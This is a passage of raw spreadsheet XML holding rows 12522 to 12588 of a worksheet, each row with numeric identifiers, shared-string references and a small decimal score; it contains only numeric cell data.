    <row r="12522" ht="15.75" customHeight="1">
      <c r="A12522" s="1">
        <v>16530.0</v>
      </c>
      <c r="B12522" s="2">
        <v>4.6710179E7</v>
      </c>
      <c r="C12522" s="2" t="s">
        <v>12038</v>
      </c>
      <c r="D12522" s="2">
        <v>1.0</v>
      </c>
      <c r="E12522" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12522" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12523" ht="15.75" customHeight="1">
      <c r="A12523" s="1">
        <v>16663.0</v>
      </c>
      <c r="B12523" s="2">
        <v>4.7252241E7</v>
      </c>
      <c r="C12523" s="2" t="s">
        <v>12039</v>
      </c>
      <c r="D12523" s="2">
        <v>1.0</v>
      </c>
      <c r="E12523" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12523" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12524" ht="15.75" customHeight="1">
      <c r="A12524" s="1">
        <v>16864.0</v>
      </c>
      <c r="B12524" s="2">
        <v>4.7948337E7</v>
      </c>
      <c r="C12524" s="2" t="s">
        <v>12040</v>
      </c>
      <c r="D12524" s="2">
        <v>1.0</v>
      </c>
      <c r="E12524" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12524" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12525" ht="15.75" customHeight="1">
      <c r="A12525" s="1">
        <v>16865.0</v>
      </c>
      <c r="B12525" s="2">
        <v>4.7948337E7</v>
      </c>
      <c r="C12525" s="2" t="s">
        <v>12041</v>
      </c>
      <c r="D12525" s="2">
        <v>1.0</v>
      </c>
      <c r="E12525" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12525" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12526" ht="15.75" customHeight="1">
      <c r="A12526" s="1">
        <v>17476.0</v>
      </c>
      <c r="B12526" s="2">
        <v>4.9932283E7</v>
      </c>
      <c r="C12526" s="2" t="s">
        <v>12042</v>
      </c>
      <c r="D12526" s="2">
        <v>1.0</v>
      </c>
      <c r="E12526" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12526" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12527" ht="15.75" customHeight="1">
      <c r="A12527" s="1">
        <v>17745.0</v>
      </c>
      <c r="B12527" s="2">
        <v>5.0680936E7</v>
      </c>
      <c r="C12527" s="2" t="s">
        <v>12043</v>
      </c>
      <c r="D12527" s="2">
        <v>1.0</v>
      </c>
      <c r="E12527" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12527" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12528" ht="15.75" customHeight="1">
      <c r="A12528" s="1">
        <v>17798.0</v>
      </c>
      <c r="B12528" s="2">
        <v>5.0803686E7</v>
      </c>
      <c r="C12528" s="2" t="s">
        <v>12044</v>
      </c>
      <c r="D12528" s="2">
        <v>1.0</v>
      </c>
      <c r="E12528" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12528" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12529" ht="15.75" customHeight="1">
      <c r="A12529" s="1">
        <v>18301.0</v>
      </c>
      <c r="B12529" s="2">
        <v>5.2340186E7</v>
      </c>
      <c r="C12529" s="2" t="s">
        <v>12045</v>
      </c>
      <c r="D12529" s="2">
        <v>1.0</v>
      </c>
      <c r="E12529" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12529" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12530" ht="15.75" customHeight="1">
      <c r="A12530" s="1">
        <v>18383.0</v>
      </c>
      <c r="B12530" s="2">
        <v>5.2583656E7</v>
      </c>
      <c r="C12530" s="2" t="s">
        <v>12046</v>
      </c>
      <c r="D12530" s="2">
        <v>1.0</v>
      </c>
      <c r="E12530" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12530" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12531" ht="15.75" customHeight="1">
      <c r="A12531" s="1">
        <v>18595.0</v>
      </c>
      <c r="B12531" s="2">
        <v>5.3259342E7</v>
      </c>
      <c r="C12531" s="2" t="s">
        <v>12047</v>
      </c>
      <c r="D12531" s="2">
        <v>1.0</v>
      </c>
      <c r="E12531" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12531" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12532" ht="15.75" customHeight="1">
      <c r="A12532" s="1">
        <v>18724.0</v>
      </c>
      <c r="B12532" s="2">
        <v>5.3693864E7</v>
      </c>
      <c r="C12532" s="2" t="s">
        <v>12048</v>
      </c>
      <c r="D12532" s="2">
        <v>1.0</v>
      </c>
      <c r="E12532" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12532" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12533" ht="15.75" customHeight="1">
      <c r="A12533" s="1">
        <v>18913.0</v>
      </c>
      <c r="B12533" s="2">
        <v>5.4201966E7</v>
      </c>
      <c r="C12533" s="2" t="s">
        <v>12049</v>
      </c>
      <c r="D12533" s="2">
        <v>1.0</v>
      </c>
      <c r="E12533" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12533" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12534" ht="15.75" customHeight="1">
      <c r="A12534" s="1">
        <v>19285.0</v>
      </c>
      <c r="B12534" s="2">
        <v>5.5169394E7</v>
      </c>
      <c r="C12534" s="2" t="s">
        <v>12050</v>
      </c>
      <c r="D12534" s="2">
        <v>1.0</v>
      </c>
      <c r="E12534" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12534" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12535" ht="15.75" customHeight="1">
      <c r="A12535" s="1">
        <v>19372.0</v>
      </c>
      <c r="B12535" s="2">
        <v>5.5482878E7</v>
      </c>
      <c r="C12535" s="2" t="s">
        <v>12051</v>
      </c>
      <c r="D12535" s="2">
        <v>1.0</v>
      </c>
      <c r="E12535" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12535" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12536" ht="15.75" customHeight="1">
      <c r="A12536" s="1">
        <v>19495.0</v>
      </c>
      <c r="B12536" s="2">
        <v>5.5889623E7</v>
      </c>
      <c r="C12536" s="2" t="s">
        <v>12052</v>
      </c>
      <c r="D12536" s="2">
        <v>1.0</v>
      </c>
      <c r="E12536" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12536" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12537" ht="15.75" customHeight="1">
      <c r="A12537" s="1">
        <v>21747.0</v>
      </c>
      <c r="B12537" s="2">
        <v>2.6021274E7</v>
      </c>
      <c r="C12537" s="2" t="s">
        <v>12053</v>
      </c>
      <c r="D12537" s="2">
        <v>1.0</v>
      </c>
      <c r="E12537" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12537" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12538" ht="15.75" customHeight="1">
      <c r="A12538" s="1">
        <v>21970.0</v>
      </c>
      <c r="B12538" s="2">
        <v>2.9132997E7</v>
      </c>
      <c r="C12538" s="2" t="s">
        <v>12054</v>
      </c>
      <c r="D12538" s="2">
        <v>1.0</v>
      </c>
      <c r="E12538" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12538" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12539" ht="15.75" customHeight="1">
      <c r="A12539" s="1">
        <v>22025.0</v>
      </c>
      <c r="B12539" s="2">
        <v>3.0100946E7</v>
      </c>
      <c r="C12539" s="2" t="s">
        <v>12055</v>
      </c>
      <c r="D12539" s="2">
        <v>1.0</v>
      </c>
      <c r="E12539" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12539" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12540" ht="15.75" customHeight="1">
      <c r="A12540" s="1">
        <v>22058.0</v>
      </c>
      <c r="B12540" s="2">
        <v>3.0498937E7</v>
      </c>
      <c r="C12540" s="2" t="s">
        <v>12056</v>
      </c>
      <c r="D12540" s="2">
        <v>1.0</v>
      </c>
      <c r="E12540" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12540" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12541" ht="15.75" customHeight="1">
      <c r="A12541" s="1">
        <v>22061.0</v>
      </c>
      <c r="B12541" s="2">
        <v>3.0514549E7</v>
      </c>
      <c r="C12541" s="2" t="s">
        <v>12057</v>
      </c>
      <c r="D12541" s="2">
        <v>1.0</v>
      </c>
      <c r="E12541" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12541" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12542" ht="15.75" customHeight="1">
      <c r="A12542" s="1">
        <v>22173.0</v>
      </c>
      <c r="B12542" s="2">
        <v>3.1649547E7</v>
      </c>
      <c r="C12542" s="2" t="s">
        <v>12058</v>
      </c>
      <c r="D12542" s="2">
        <v>1.0</v>
      </c>
      <c r="E12542" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12542" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12543" ht="15.75" customHeight="1">
      <c r="A12543" s="1">
        <v>22330.0</v>
      </c>
      <c r="B12543" s="2">
        <v>3.4177936E7</v>
      </c>
      <c r="C12543" s="2" t="s">
        <v>12059</v>
      </c>
      <c r="D12543" s="2">
        <v>1.0</v>
      </c>
      <c r="E12543" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12543" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12544" ht="15.75" customHeight="1">
      <c r="A12544" s="1">
        <v>22520.0</v>
      </c>
      <c r="B12544" s="2">
        <v>3.7641742E7</v>
      </c>
      <c r="C12544" s="2" t="s">
        <v>12060</v>
      </c>
      <c r="D12544" s="2">
        <v>1.0</v>
      </c>
      <c r="E12544" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12544" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12545" ht="15.75" customHeight="1">
      <c r="A12545" s="1">
        <v>22812.0</v>
      </c>
      <c r="B12545" s="2">
        <v>4.6079119E7</v>
      </c>
      <c r="C12545" s="2" t="s">
        <v>12061</v>
      </c>
      <c r="D12545" s="2">
        <v>1.0</v>
      </c>
      <c r="E12545" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12545" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12546" ht="15.75" customHeight="1">
      <c r="A12546" s="1">
        <v>23978.0</v>
      </c>
      <c r="B12546" s="2">
        <v>9082285.0</v>
      </c>
      <c r="C12546" s="2" t="s">
        <v>12062</v>
      </c>
      <c r="D12546" s="2">
        <v>1.0</v>
      </c>
      <c r="E12546" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12546" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12547" ht="15.75" customHeight="1">
      <c r="A12547" s="1">
        <v>24004.0</v>
      </c>
      <c r="B12547" s="2">
        <v>9246746.0</v>
      </c>
      <c r="C12547" s="2" t="s">
        <v>12063</v>
      </c>
      <c r="D12547" s="2">
        <v>1.0</v>
      </c>
      <c r="E12547" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12547" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12548" ht="15.75" customHeight="1">
      <c r="A12548" s="1">
        <v>24205.0</v>
      </c>
      <c r="B12548" s="2">
        <v>1.0369639E7</v>
      </c>
      <c r="C12548" s="2" t="s">
        <v>12064</v>
      </c>
      <c r="D12548" s="2">
        <v>1.0</v>
      </c>
      <c r="E12548" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12548" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12549" ht="15.75" customHeight="1">
      <c r="A12549" s="1">
        <v>24675.0</v>
      </c>
      <c r="B12549" s="2">
        <v>1.1583741E7</v>
      </c>
      <c r="C12549" s="2" t="s">
        <v>12065</v>
      </c>
      <c r="D12549" s="2">
        <v>1.0</v>
      </c>
      <c r="E12549" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12549" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12550" ht="15.75" customHeight="1">
      <c r="A12550" s="1">
        <v>26146.0</v>
      </c>
      <c r="B12550" s="2">
        <v>1.6045483E7</v>
      </c>
      <c r="C12550" s="2" t="s">
        <v>12066</v>
      </c>
      <c r="D12550" s="2">
        <v>1.0</v>
      </c>
      <c r="E12550" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12550" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12551" ht="15.75" customHeight="1">
      <c r="A12551" s="1">
        <v>26933.0</v>
      </c>
      <c r="B12551" s="2">
        <v>1.9521256E7</v>
      </c>
      <c r="C12551" s="2" t="s">
        <v>12067</v>
      </c>
      <c r="D12551" s="2">
        <v>1.0</v>
      </c>
      <c r="E12551" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12551" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12552" ht="15.75" customHeight="1">
      <c r="A12552" s="1">
        <v>26964.0</v>
      </c>
      <c r="B12552" s="2">
        <v>1.9640834E7</v>
      </c>
      <c r="C12552" s="2" t="s">
        <v>12068</v>
      </c>
      <c r="D12552" s="2">
        <v>1.0</v>
      </c>
      <c r="E12552" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12552" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12553" ht="15.75" customHeight="1">
      <c r="A12553" s="1">
        <v>26967.0</v>
      </c>
      <c r="B12553" s="2">
        <v>1.9640834E7</v>
      </c>
      <c r="C12553" s="2" t="s">
        <v>12069</v>
      </c>
      <c r="D12553" s="2">
        <v>1.0</v>
      </c>
      <c r="E12553" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12553" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12554" ht="15.75" customHeight="1">
      <c r="A12554" s="1">
        <v>27009.0</v>
      </c>
      <c r="B12554" s="2">
        <v>1.9948284E7</v>
      </c>
      <c r="C12554" s="2" t="s">
        <v>12070</v>
      </c>
      <c r="D12554" s="2">
        <v>1.0</v>
      </c>
      <c r="E12554" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12554" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12555" ht="15.75" customHeight="1">
      <c r="A12555" s="1">
        <v>27327.0</v>
      </c>
      <c r="B12555" s="2">
        <v>2.1412736E7</v>
      </c>
      <c r="C12555" s="2" t="s">
        <v>12071</v>
      </c>
      <c r="D12555" s="2">
        <v>1.0</v>
      </c>
      <c r="E12555" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12555" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12556" ht="15.75" customHeight="1">
      <c r="A12556" s="1">
        <v>27343.0</v>
      </c>
      <c r="B12556" s="2">
        <v>2.1456103E7</v>
      </c>
      <c r="C12556" s="2" t="s">
        <v>12072</v>
      </c>
      <c r="D12556" s="2">
        <v>1.0</v>
      </c>
      <c r="E12556" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12556" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12557" ht="15.75" customHeight="1">
      <c r="A12557" s="1">
        <v>27525.0</v>
      </c>
      <c r="B12557" s="2">
        <v>2.2168174E7</v>
      </c>
      <c r="C12557" s="2" t="s">
        <v>12073</v>
      </c>
      <c r="D12557" s="2">
        <v>1.0</v>
      </c>
      <c r="E12557" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12557" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12558" ht="15.75" customHeight="1">
      <c r="A12558" s="1">
        <v>28012.0</v>
      </c>
      <c r="B12558" s="2">
        <v>2.4340949E7</v>
      </c>
      <c r="C12558" s="2" t="s">
        <v>12074</v>
      </c>
      <c r="D12558" s="2">
        <v>1.0</v>
      </c>
      <c r="E12558" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12558" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12559" ht="15.75" customHeight="1">
      <c r="A12559" s="1">
        <v>28492.0</v>
      </c>
      <c r="B12559" s="2">
        <v>2.6668667E7</v>
      </c>
      <c r="C12559" s="2" t="s">
        <v>12075</v>
      </c>
      <c r="D12559" s="2">
        <v>1.0</v>
      </c>
      <c r="E12559" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12559" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12560" ht="15.75" customHeight="1">
      <c r="A12560" s="1">
        <v>28928.0</v>
      </c>
      <c r="B12560" s="2">
        <v>2.9547356E7</v>
      </c>
      <c r="C12560" s="2" t="s">
        <v>12076</v>
      </c>
      <c r="D12560" s="2">
        <v>1.0</v>
      </c>
      <c r="E12560" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12560" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12561" ht="15.75" customHeight="1">
      <c r="A12561" s="1">
        <v>29122.0</v>
      </c>
      <c r="B12561" s="2">
        <v>3.0498936E7</v>
      </c>
      <c r="C12561" s="2" t="s">
        <v>12056</v>
      </c>
      <c r="D12561" s="2">
        <v>1.0</v>
      </c>
      <c r="E12561" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12561" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12562" ht="15.75" customHeight="1">
      <c r="A12562" s="1">
        <v>29129.0</v>
      </c>
      <c r="B12562" s="2">
        <v>3.0514548E7</v>
      </c>
      <c r="C12562" s="2" t="s">
        <v>12077</v>
      </c>
      <c r="D12562" s="2">
        <v>1.0</v>
      </c>
      <c r="E12562" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12562" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12563" ht="15.75" customHeight="1">
      <c r="A12563" s="1">
        <v>29411.0</v>
      </c>
      <c r="B12563" s="2">
        <v>3.2081987E7</v>
      </c>
      <c r="C12563" s="2" t="s">
        <v>12078</v>
      </c>
      <c r="D12563" s="2">
        <v>1.0</v>
      </c>
      <c r="E12563" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12563" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12564" ht="15.75" customHeight="1">
      <c r="A12564" s="1">
        <v>29596.0</v>
      </c>
      <c r="B12564" s="2">
        <v>3.3554951E7</v>
      </c>
      <c r="C12564" s="2" t="s">
        <v>12079</v>
      </c>
      <c r="D12564" s="2">
        <v>1.0</v>
      </c>
      <c r="E12564" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12564" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12565" ht="15.75" customHeight="1">
      <c r="A12565" s="1">
        <v>29691.0</v>
      </c>
      <c r="B12565" s="2">
        <v>3.4177935E7</v>
      </c>
      <c r="C12565" s="2" t="s">
        <v>12059</v>
      </c>
      <c r="D12565" s="2">
        <v>1.0</v>
      </c>
      <c r="E12565" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12565" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12566" ht="15.75" customHeight="1">
      <c r="A12566" s="1">
        <v>29941.0</v>
      </c>
      <c r="B12566" s="2">
        <v>3607484.0</v>
      </c>
      <c r="C12566" s="2" t="s">
        <v>12080</v>
      </c>
      <c r="D12566" s="2">
        <v>1.0</v>
      </c>
      <c r="E12566" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12566" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12567" ht="15.75" customHeight="1">
      <c r="A12567" s="1">
        <v>30297.0</v>
      </c>
      <c r="B12567" s="2">
        <v>3.7844136E7</v>
      </c>
      <c r="C12567" s="2" t="s">
        <v>12081</v>
      </c>
      <c r="D12567" s="2">
        <v>1.0</v>
      </c>
      <c r="E12567" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12567" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12568" ht="15.75" customHeight="1">
      <c r="A12568" s="1">
        <v>31058.0</v>
      </c>
      <c r="B12568" s="2">
        <v>4.800768E7</v>
      </c>
      <c r="C12568" s="2" t="s">
        <v>12082</v>
      </c>
      <c r="D12568" s="2">
        <v>1.0</v>
      </c>
      <c r="E12568" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12568" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12569" ht="15.75" customHeight="1">
      <c r="A12569" s="1">
        <v>31099.0</v>
      </c>
      <c r="B12569" s="2">
        <v>4855247.0</v>
      </c>
      <c r="C12569" s="2" t="s">
        <v>12083</v>
      </c>
      <c r="D12569" s="2">
        <v>1.0</v>
      </c>
      <c r="E12569" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12569" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12570" ht="15.75" customHeight="1">
      <c r="A12570" s="1">
        <v>32106.0</v>
      </c>
      <c r="B12570" s="2">
        <v>5.4078661E7</v>
      </c>
      <c r="C12570" s="2" t="s">
        <v>12084</v>
      </c>
      <c r="D12570" s="2">
        <v>1.0</v>
      </c>
      <c r="E12570" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12570" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12571" ht="15.75" customHeight="1">
      <c r="A12571" s="1">
        <v>32234.0</v>
      </c>
      <c r="B12571" s="2">
        <v>5501738.0</v>
      </c>
      <c r="C12571" s="2" t="s">
        <v>12085</v>
      </c>
      <c r="D12571" s="2">
        <v>1.0</v>
      </c>
      <c r="E12571" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12571" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12572" ht="15.75" customHeight="1">
      <c r="A12572" s="1">
        <v>32521.0</v>
      </c>
      <c r="B12572" s="2">
        <v>5.7287094E7</v>
      </c>
      <c r="C12572" s="2" t="s">
        <v>12086</v>
      </c>
      <c r="D12572" s="2">
        <v>1.0</v>
      </c>
      <c r="E12572" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12572" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12573" ht="15.75" customHeight="1">
      <c r="A12573" s="1">
        <v>32624.0</v>
      </c>
      <c r="B12573" s="2">
        <v>5840027.0</v>
      </c>
      <c r="C12573" s="2" t="s">
        <v>12087</v>
      </c>
      <c r="D12573" s="2">
        <v>1.0</v>
      </c>
      <c r="E12573" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12573" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12574" ht="15.75" customHeight="1">
      <c r="A12574" s="1">
        <v>32978.0</v>
      </c>
      <c r="B12574" s="2">
        <v>6580204.0</v>
      </c>
      <c r="C12574" s="2" t="s">
        <v>12088</v>
      </c>
      <c r="D12574" s="2">
        <v>1.0</v>
      </c>
      <c r="E12574" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12574" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12575" ht="15.75" customHeight="1">
      <c r="A12575" s="1">
        <v>33042.0</v>
      </c>
      <c r="B12575" s="2">
        <v>6739237.0</v>
      </c>
      <c r="C12575" s="2" t="s">
        <v>12089</v>
      </c>
      <c r="D12575" s="2">
        <v>1.0</v>
      </c>
      <c r="E12575" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12575" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12576" ht="15.75" customHeight="1">
      <c r="A12576" s="1">
        <v>1639.0</v>
      </c>
      <c r="B12576" s="2">
        <v>2.8012699E7</v>
      </c>
      <c r="C12576" s="2" t="s">
        <v>12090</v>
      </c>
      <c r="D12576" s="2">
        <v>1.0</v>
      </c>
      <c r="E12576" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12576" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="12577" ht="15.75" customHeight="1">
      <c r="A12577" s="1">
        <v>3672.0</v>
      </c>
      <c r="B12577" s="2">
        <v>3.9418998E7</v>
      </c>
      <c r="C12577" s="2" t="s">
        <v>12091</v>
      </c>
      <c r="D12577" s="2">
        <v>1.0</v>
      </c>
      <c r="E12577" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12577" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="12578" ht="15.75" customHeight="1">
      <c r="A12578" s="1">
        <v>8909.0</v>
      </c>
      <c r="B12578" s="2">
        <v>5.4806258E7</v>
      </c>
      <c r="C12578" s="2" t="s">
        <v>12092</v>
      </c>
      <c r="D12578" s="2">
        <v>1.0</v>
      </c>
      <c r="E12578" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12578" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="12579" ht="15.75" customHeight="1">
      <c r="A12579" s="1">
        <v>23006.0</v>
      </c>
      <c r="B12579" s="2">
        <v>4976391.0</v>
      </c>
      <c r="C12579" s="2" t="s">
        <v>12093</v>
      </c>
      <c r="D12579" s="2">
        <v>1.0</v>
      </c>
      <c r="E12579" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12579" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="12580" ht="15.75" customHeight="1">
      <c r="A12580" s="1">
        <v>30112.0</v>
      </c>
      <c r="B12580" s="2">
        <v>3.6771448E7</v>
      </c>
      <c r="C12580" s="2" t="s">
        <v>12094</v>
      </c>
      <c r="D12580" s="2">
        <v>1.0</v>
      </c>
      <c r="E12580" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12580" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="12581" ht="15.75" customHeight="1">
      <c r="A12581" s="1">
        <v>6569.0</v>
      </c>
      <c r="B12581" s="2">
        <v>4.8903907E7</v>
      </c>
      <c r="C12581" s="2" t="s">
        <v>12095</v>
      </c>
      <c r="D12581" s="2">
        <v>1.0</v>
      </c>
      <c r="E12581" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12581" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="12582" ht="15.75" customHeight="1">
      <c r="A12582" s="1">
        <v>19929.0</v>
      </c>
      <c r="B12582" s="2">
        <v>5.7434773E7</v>
      </c>
      <c r="C12582" s="2" t="s">
        <v>12096</v>
      </c>
      <c r="D12582" s="2">
        <v>1.0</v>
      </c>
      <c r="E12582" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12582" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="12583" ht="15.75" customHeight="1">
      <c r="A12583" s="1">
        <v>5907.0</v>
      </c>
      <c r="B12583" s="2">
        <v>4.7202668E7</v>
      </c>
      <c r="C12583" s="2" t="s">
        <v>12097</v>
      </c>
      <c r="D12583" s="2">
        <v>1.0</v>
      </c>
      <c r="E12583" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12583" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="12584" ht="15.75" customHeight="1">
      <c r="A12584" s="1">
        <v>19506.0</v>
      </c>
      <c r="B12584" s="2">
        <v>5.5923986E7</v>
      </c>
      <c r="C12584" s="2" t="s">
        <v>12098</v>
      </c>
      <c r="D12584" s="2">
        <v>1.0</v>
      </c>
      <c r="E12584" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12584" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="12585" ht="15.75" customHeight="1">
      <c r="A12585" s="1">
        <v>25527.0</v>
      </c>
      <c r="B12585" s="2">
        <v>1.4221037E7</v>
      </c>
      <c r="C12585" s="2" t="s">
        <v>12099</v>
      </c>
      <c r="D12585" s="2">
        <v>1.0</v>
      </c>
      <c r="E12585" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12585" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="12586" ht="15.75" customHeight="1">
      <c r="A12586" s="1">
        <v>29455.0</v>
      </c>
      <c r="B12586" s="2">
        <v>3.2249452E7</v>
      </c>
      <c r="C12586" s="2" t="s">
        <v>12100</v>
      </c>
      <c r="D12586" s="2">
        <v>1.0</v>
      </c>
      <c r="E12586" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12586" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="12587" ht="15.75" customHeight="1">
      <c r="A12587" s="1">
        <v>10168.0</v>
      </c>
      <c r="B12587" s="2">
        <v>5.7353222E7</v>
      </c>
      <c r="C12587" s="2" t="s">
        <v>12101</v>
      </c>
      <c r="D12587" s="2">
        <v>1.0</v>
      </c>
      <c r="E12587" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12587" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="12588" ht="15.75" customHeight="1">
      <c r="A12588" s="1">
        <v>15848.0</v>
      </c>
      <c r="B12588" s="2">
        <v>4.4432458E7</v>
      </c>
      <c r="C12588" s="2" t="s">
        <v>12102</v>
      </c>
      <c r="D12588" s="2">
        <v>1.0</v>
      </c>
      <c r="E12588" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12588" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
